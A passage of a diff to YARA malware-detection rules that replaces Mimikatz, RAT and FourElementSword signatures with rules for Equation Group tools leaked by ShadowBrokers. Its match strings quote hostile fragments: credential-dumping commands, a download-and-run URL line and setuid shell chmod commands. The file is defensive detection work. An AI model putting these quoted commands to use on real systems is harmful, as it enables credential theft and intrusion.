+		hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
 
 	strings:
-		$s1 = "SID               :" ascii fullword
-		$s2 = "* NTLM     :" ascii fullword
-		$s3 = "Authentication Id :" ascii fullword
-		$s4 = "wdigest :" ascii fullword
+		$s1 = "temp = ((left >> 1) ^ right) & 0x55555555" fullword ascii
+		$s2 = "right ^= (temp <<  16) & 0xffffffff" fullword ascii
+		$s3 = "tempresult = \"\"" fullword ascii
+		$s4 = "num = self.bytes2long(data)" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x2123 and filesize < 80KB and 3 of them ) or ( all of them )
 }
-
-rule SIGNATURE_BASE_Mimikatz_Strings : FILE
+rule SIGNATURE_BASE_Equationgroup__Ftshell : FILE
 {
 	meta:
-		description = "Detects Mimikatz strings"
+		description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8f63b71-c66c-5c10-9268-2d8970f7c8a1"
-		date = "2016-06-08"
+		id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L121-L154"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L990-L1007"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "baba1e159c0fb23f68b80459291a2d2c52e84f742f51ca30b894f7fc6282ad7a"
-		score = 65
+		logic_hash = "84c646b2c81f870f650fafd26471017b00b3b7020e72390f818304958e694572"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
+		hash4 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
 
 	strings:
-		$x1 = "sekurlsa::logonpasswords" fullword wide ascii
-		$x2 = "List tickets in MIT/Heimdall ccache" fullword ascii wide
-		$x3 = "kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage %08x" fullword ascii wide
-		$x4 = "* Injecting ticket :" fullword wide ascii
-		$x5 = "mimidrv.sys" fullword wide ascii
-		$x6 = "Lists LM & NTLM credentials" fullword wide ascii
-		$x7 = "\\_ kerberos -" wide ascii
-		$x8 = "* unknow   :" fullword wide ascii
-		$x9 = "\\_ *Password replace ->" wide ascii
-		$x10 = "KIWI_MSV1_0_PRIMARY_CREDENTIALS KO" ascii wide
-		$x11 = "\\\\.\\mimidrv" wide ascii
-		$x12 = "Switch to MINIDUMP :" fullword wide ascii
-		$x13 = "[masterkey] with password: %s (%s user)" fullword wide
-		$x14 = "Clear screen (doesn't work with redirections, like PsExec)" fullword wide
-		$x15 = "** Session key is NULL! It means allowtgtsessionkey is not set to 1 **" fullword wide
-		$x16 = "[masterkey] with DPAPI_SYSTEM (machine, then user): " fullword wide
+		$s1 = "if { [string length $uRemoteUploadCommand]" fullword ascii
+		$s2 = "processUpload" fullword ascii
+		$s3 = "global dothisreallyquiet" fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 3 of them ) ) and not pe.imphash ( ) == "77eaeca738dd89410a432c6bd6459907"
+		( uint16( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Appinithook : FILE
+rule SIGNATURE_BASE_Equationgroup_Store_Linux_I386_V_3_3_0 : FILE
 {
 	meta:
-		description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "73713011-3083-5cdf-b59c-f4da67d2d2ab"
-		date = "2015-07-15"
+		id = "b88be148-5308-583a-b41e-2bea9b837e2a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/Z292v6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L156-L176"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1018-L1033"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45"
-		logic_hash = "a4de3a062e309715c339a45a16a7ff8f9a55851cb41097a6925fd11f649547d2"
-		score = 70
+		logic_hash = "f284c2fecee23f01f83e0534d7d56a88b102e6dcc02a26321fe246604dc8cb0e"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "abc27fda9a0921d7cf2863c29768af15fdfe47a0b3e7a131ef7e5cc057576fbc"
 
 	strings:
-		$s0 = "\\Release\\AppInitHook.pdb" ascii
-		$s1 = "AppInitHook.dll" fullword ascii
-		$s2 = "mimikatz.exe" fullword wide
-		$s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide
-		$s4 = "mhook\\disasm-lib\\disasm.c" fullword wide
-		$s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide
-		$s6 = "VoidFunc" fullword ascii
+		$s1 = "[-] Failed to map file: %s" fullword ascii
+		$s2 = "[-] can not NULL terminate input data" fullword ascii
+		$s3 = "[!] Name has size of 0!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
+		( uint16( 0 ) == 0x457f and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_Mimikatz_Skeletonkey_In_Memory_Aug20_1
+rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Genkey : FILE
 {
 	meta:
-		description = "Detects Mimikatz SkeletonKey in Memory"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7c1c512-e944-5d87-ac57-cdc9ab7cf660"
-		date = "2020-08-09"
+		id = "fb305be7-9e16-502e-89ca-a40bb6890404"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/sbousseaden/status/1292143504131600384?s=12"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L178-L190"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1035-L1049"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0cc9a4d3b63e07a695df342bd2c96a55570502d6fd0ab9a1b61d63e28e1c3e05"
+		logic_hash = "c1d823e297b0b1f47f12a3240d59f5ecc482f1140e5b2962f76ec2fff719664a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0ce455fb7f46e54a5db9bef85df1087ff14d2fc60a88f2becd5badb9c7fe3e89"
 
 	strings:
-		$x1 = { 60 ba 4f ca c7 44 24 34 dc 46 6c 7a c7 44 24 38
-              03 3c 17 81 c7 44 24 3c 94 c0 3d f6 }
+		$x1 = "rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')" fullword ascii
+		$x2 = "client_auth = binascii.hexlify(lo_execute('openssl rand 16'))" fullword ascii
 
 	condition:
-		1 of them
+		( filesize < 3KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_Mimikatz_Memssp_Hookfn
+rule SIGNATURE_BASE_Equationgroup_Cursetingle_2_0_1_2_Mswin32_V_2_0_1 : FILE
 {
 	meta:
-		description = "Detects Default Mimikatz memssp module in-memory"
-		author = "SBousseaden"
-		id = "89940110-8a5e-5a28-bf64-3b568f8ef1f8"
-		date = "2020-08-26"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7a1870ba-d600-5c11-8d3d-41395ad8be63"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/sbousseaden/YaraHunts/blob/master/mimikatz_memssp_hookfn.yara"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L192-L216"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1051-L1065"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "27cf87f801111f17af76ab4c4f8329b73165f24f755d33edbb22d845bba6d3ff"
-		score = 70
+		logic_hash = "bc27edc946beb5065d4fe43e53a33b448c24c7dd3eae0cedd4770c02fce7836b"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "614bf159b956f20d66cedf25af7503b41e91841c75707af0cdf4495084092a61"
 
 	strings:
-		$xc1 = { 48 81 EC A8 00 00 00 C7 84 24 88 00 00 00 ?? ??
-               ?? ?? C7 84 24 8C 00 00 00 ?? ?? ?? ?? C7 84 24
-               90 00 00 00 ?? ?? ?? 00 C7 84 24 80 00 00 00 61
-               00 00 00 C7 44 24 40 5B 00 25 00 C7 44 24 44 30
-               00 38 00 C7 44 24 48 78 00 3A 00 C7 44 24 4C 25
-               00 30 00 C7 44 24 50 38 00 78 00 C7 44 24 54 5D
-               00 20 00 C7 44 24 58 25 00 77 00 C7 44 24 5C 5A
-               00 5C 00 C7 44 24 60 25 00 77 00 C7 44 24 64 5A
-               00 09 00 C7 44 24 68 25 00 77 00 C7 44 24 6C 5A
-               00 0A 00 C7 44 24 70 00 00 00 00 48 8D 94 24 80
-               00 00 00 48 8D 8C 24 88 00 00 00 48 B8 A0 7D ??
-               ?? ?? ?? 00 00 FF D0 }
+		$s1 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
+		$s2 = "0123456789abcdefABCEDF:" fullword ascii
 
 	condition:
-		$xc1
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_Mimikatz_Icon : FILE
+rule SIGNATURE_BASE_Equationgroup_Cursesleepy_Mswin32_V_1_0_0 : FILE
 {
 	meta:
-		description = "Detects mimikatz icon in PE file"
-		author = "Arnim Rupp"
-		id = "2a5ea476-a30d-5eac-b57a-3fb49386c046"
-		date = "2023-02-18"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f60ff218-1cb7-5f44-a756-1ee67649e6a6"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://blog.gentilkiwi.com/mimikatz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L218-L238"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1067-L1082"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a07d477d1645e6df4f0706e44df11ea006c89e4d3218ed18a8a97b60853ff4ff"
-		score = 60
+		logic_hash = "0dcbf2b314ff9c392ae0cb4f14762dd20c6b85f7f547af683db3aea1c57dee57"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
-		hash1 = "61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1"
-		hash2 = "1c3f584164ef595a37837701739a11e17e46f9982fdcee020cf5e23bad1a0925"
-		hash3 = "c6bb98b24206228a54493274ff9757ce7e0cbb4ab2968af978811cc4a98fde85"
-		hash4 = "721d3476cdc655305902d682651fffbe72e54a97cd7e91f44d1a47606bae47ab"
-		hash5 = "c0f3523151fa307248b2c64bdaac5f167b19be6fccff9eba92ac363f6d5d2595"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6293439b4b49e94f923c76e302f5fc437023c91e063e67877d22333f05a24352"
 
 	strings:
-		$ico = {79 e1 d7 ff 7e e5 db ff 7f e8 dc ff 85 eb dd ff ba ff f1 ff 66 a0 b6 ff 01 38 61 ff 22 50 75 c3}
+		$s1 = "A}%j,R" fullword ascii
+		$op1 = { a1 e0 43 41 00 8b 0d 34 44 41 00 6b c0 }
+		$op2 = { 33 C0 F3 A6 74 14 8B 5D 08 8B 4B 34 50 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $ico and filesize < 10MB
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_Indetectables_RAT : FILE
+rule SIGNATURE_BASE_Equationgroup_Cursehelper_Win2K_I686_V_2_2_0 : FILE
 {
 	meta:
-		description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8322822-617c-50cf-8b64-60da3a202ca5"
-		date = "2015-10-01"
+		id = "1c24aa6a-74ab-5832-876b-5cab43dc6bb7"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_indetectables_rat.yar#L8-L33"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1084-L1100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "840a0c92ac731d9e88d0bdccb39598e4ff476e8630ec08f6c4024a31e258ebd0"
+		logic_hash = "f6c92fc3540750a1223682b1672575b3a3120f5ebf63190a9b31d7e4e5ce13c7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
-		hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
-		hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
+		hash1 = "5ac6fde8a06f4ade10d672e60e92ffbf78c4e8db6b5152e23171f6f53af0bfe1"
 
 	strings:
-		$s1 = "Coded By M3" fullword wide
-		$s2 = "Stub Undetector M3" fullword wide
-		$s3 = "www.webmenegatti.com.br" wide
-		$s4 = "M3n3gatt1" fullword wide
-		$s5 = "TheMisterFUD" fullword wide
-		$s6 = "KillZoneKillZoneKill" fullword ascii
-		$s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
-		$s8 = "M3_F_U_D_M3" ascii
-		$s9 = "M3n3gatt1hack3r" fullword wide
-		$s10 = "M3n3gatt1hack3r" fullword ascii
+		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}" fullword ascii
+		$op1 = { 8d b5 48 ff ff ff 89 34 24 e8 56 2a 00 00 c7 44 }
+		$op2 = { e9 a2 f2 ff ff ff 85 b4 fe ff ff 8b 95 a8 fe ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_Bergsilva_Malware : FILE
+rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Addkey : FILE
 {
 	meta:
-		description = "Detects a malware from the same author as the Indetectables RAT"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5f35aea6-1d80-594a-a6e0-8e8bb30bc358"
-		date = "2015-10-01"
+		id = "a025e379-c24e-56ac-b53c-bd38d51f3437"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_indetectables_rat.yar#L35-L56"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1102-L1117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "03b823040a057ffbef9bcb3094a672fd75e141f3e82c77548adbe1c465d329fb"
+		logic_hash = "ec5b7499e3c3cc6b581c381ae61a4c987691c0d93dd589a5907fd7419335963a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
-		hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
+		hash1 = "6c67c03716d06a99f20c1044585d6bde7df43fee89f38915db0b03a42a3a9f4b"
 
 	strings:
-		$x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
-		$x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide
-		$s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
-		$s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
-		$s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
-		$s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
-		$s5 = "https://dl.dropbox.com/u/105015858" wide
+		$x1 = "print '  -s storebin  use storebin as the Store executable\\n'" fullword ascii
+		$x2 = "os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))" fullword ascii
+		$x3 = "print '  -k keyfile   the key text file to inject'" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 2 of ( $s* ) )
+		( filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_Config_File
+rule SIGNATURE_BASE_Equationgroup_Noclient_3_3_2 : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "488a2344-3d8d-5769-aca8-9e14f38f5eb0"
-		date = "2016-04-18"
+		id = "be7c4263-e8e3-5a83-9003-063225e544ff"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L11-L28"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1119-L1136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f05cd0353817bf6c2cab396181464c31c352d6dea07e2d688def261dd6542b27"
-		logic_hash = "680e50998093e63a4e3c7d5338ac149efef83cdb41ceb4ce0245e8bd2ab99b84"
+		logic_hash = "14b1f135da81fd9a071e0f692bc7f1ab6f6f63d7dd05e1557e5c2d51135727b6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72"
 
 	strings:
-		$s0 = "01,,hccutils.dll,2" fullword ascii
-		$s1 = "RegisterDlls=OurDll" fullword ascii
-		$s2 = "[OurDll]" fullword ascii
-		$s3 = "[DefaultInstall]" fullword ascii
-		$s4 = "Signature=\"$Windows NT$\"" fullword ascii
+		$x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" fullword ascii
+		$x2 = "iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" fullword ascii
+		$x3 = "noclient: failed to execute %s: %s" fullword ascii
+		$x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
+		$s5 = "Attempting connection from 0.0.0.0:" ascii
 
 	condition:
-		4 of them
+		( filesize < 1000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_T9000 : FILE
+rule SIGNATURE_BASE_Equationgroup_Curseflower_Mswin32_V_1_0_0 : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "35ae844e-52e1-5e6f-984d-aa75ebd2f60f"
-		date = "2016-04-18"
+		id = "4138f87a-4584-5efc-a168-633838893e2f"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L30-L49"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1138-L1153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
-		logic_hash = "1c7b063cbe9d44a9d194a180570f8313460f61560ac2cda5d66e048934170faa"
+		logic_hash = "e70954945b3a5e08e5ae216b16702056b403dbf14391276eae1ed13e8273c1ee"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf"
 
 	strings:
-		$x1 = "D:\\WORK\\T9000\\" ascii
-		$x2 = "%s\\temp\\HHHH.dat" fullword wide
-		$s1 = "Elevate.dll" fullword wide
-		$s2 = "ResN32.dll" fullword wide
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword wide
-		$s4 = "igfxtray.exe" fullword wide
+		$s1 = "<pVt,<et(<st$<ct$<nt" fullword ascii
+		$op1 = { 6a 04 83 c0 08 6a 01 50 e8 10 34 00 00 83 c4 10 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_32DLL : FILE
+rule SIGNATURE_BASE_Equationgroup_Tmpwatch : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc801364-9f40-50eb-90e1-99f8605014c7"
-		date = "2016-04-18"
+		id = "2c8cac7a-761f-59f4-bc04-285af4dbe184"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L51-L68"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1155-L1169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7a200c4df99887991c638fe625d07a4a3fc2bdc887112437752b3df5c8da79b6"
-		logic_hash = "b44870975f126b8603db04b97b748f7a5a75675ffe57037f613c11d6048200b1"
+		logic_hash = "6fab5100f6ee0bf9a4e13e262c8d47e600f5aad64c7e04fe08fa42a5d78c38e8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$x1 = "%temp%\\tmp092.tmp" fullword ascii
-		$s1 = "\\System32\\ctfmon.exe" ascii
-		$s2 = "%SystemRoot%\\System32\\" ascii
-		$s3 = "32.dll" fullword ascii
+		hash1 = "65ed8066a3a240ee2e7556da74933a9b25c5109ffad893c21a626ea1b686d7c1"
+
+	strings:
+		$s1 = "chown root:root /tmp/.scsi/dev/bin/gsh" fullword ascii
+		$s2 = "chmod 4777 /tmp/.scsi/dev/bin/gsh" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 660KB and $x1 ) or ( all of them )
+		( filesize < 1KB and 1 of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_Keyainst_EXE : FILE
+rule SIGNATURE_BASE_Equationgroup_Orleans_Stride_Sunos5_9_V_2_4_0 : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "175fe2b0-3c76-5464-9a1a-218a09b25a5a"
-		date = "2016-04-18"
+		id = "ec83e1c0-91a9-5f9d-a1d2-94be725bc05a"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L70-L87"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1171-L1186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cf717a646a015ee72f965488f8df2dd3c36c4714ccc755c295645fe8d150d082"
-		logic_hash = "1491de3241a81cce4d80d6dc23886f1d8bf316112c48652a8138aa4cbadbb174"
+		logic_hash = "1380b22e661926ebb2878d89c80e115a58d0bfc060681a55564c97c1e9f36765"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6a30efb87b28e1a136a66c7708178c27d63a4a76c9c839b2fc43853158cb55ff"
 
 	strings:
-		$x1 = "C:\\ProgramData\\Keyainst.exe" fullword ascii
-		$s1 = "ShellExecuteA" fullword ascii
-		$s2 = "GetStartupInfoA" fullword ascii
-		$s3 = "SHELL32.dll" fullword ascii
+		$s1 = "_lib_version" ascii
+		$s2 = ",%02d%03d" fullword ascii
+		$s3 = "TRANSIT" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 48KB and $x1 ) or ( all of them )
+		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Fourelementsword_Elevatedll_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Noprep : FILE
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06879d75-18a3-5d49-a963-fa4bee379387"
-		date = "2016-04-18"
+		id = "27e9e51a-c853-5dcc-97d2-d3d31c5ccfac"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L89-L104"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1188-L1203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9c23febc49c7b17387767844356d38d5578727ee1150956164883cf555fe7f95"
